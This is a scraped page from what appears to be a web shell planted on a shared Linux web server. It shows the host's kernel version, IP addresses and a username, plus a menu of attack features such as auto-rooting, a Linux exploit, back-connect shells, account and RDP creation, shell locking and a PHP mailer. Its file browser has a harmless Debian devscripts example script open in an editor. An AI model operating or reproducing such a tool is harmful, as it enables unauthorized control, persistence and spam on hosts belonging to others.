Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
devscripts /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
bts_autosubscription.procmail
1.28
KB
-rw-r--r--
debbisect_buildsrc.sh
822
B
-rwxr-xr-x
debian.procmail
4.02
KB
-rw-r--r--
forward.exim
180
B
-rw-r--r--
forward.procmail
19
B
-rw-r--r--
master.procmail
3.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : debbisect_buildsrc.sh
#!/bin/sh # # use this script to build a source package with debbisect like this: # # $ DEBIAN_BISECT_SRCPKG=mysrc ./debbisect --cache=./cache "two years ago" yesterday /usr/share/doc/devscripts/examples/debbisect_buildsrc.sh # # copy this script and edit it if you want to customize it set -eu mmdebstrap --variant=apt unstable \ --aptopt='Apt::Key::gpgvcommand "/usr/share/debuerreotype/scripts/.gpgv-ignore-expiration.sh"' \ --aptopt='Acquire::Check-Valid-Until "false"' \ --customize-hook='chroot "$1" apt-get --yes build-dep '"$DEBIAN_BISECT_SRCPKG" \ --customize-hook="chroot \"\$1\" dpkg-query --showformat '\${binary:Package}=\${Version}\n' --show" \ --customize-hook='chroot "$1" apt-get source --build '"$DEBIAN_BISECT_SRCPKG" \ /dev/null $DEBIAN_BISECT_MIRROR "deb-src $DEBIAN_BISECT_MIRROR unstable main"
Close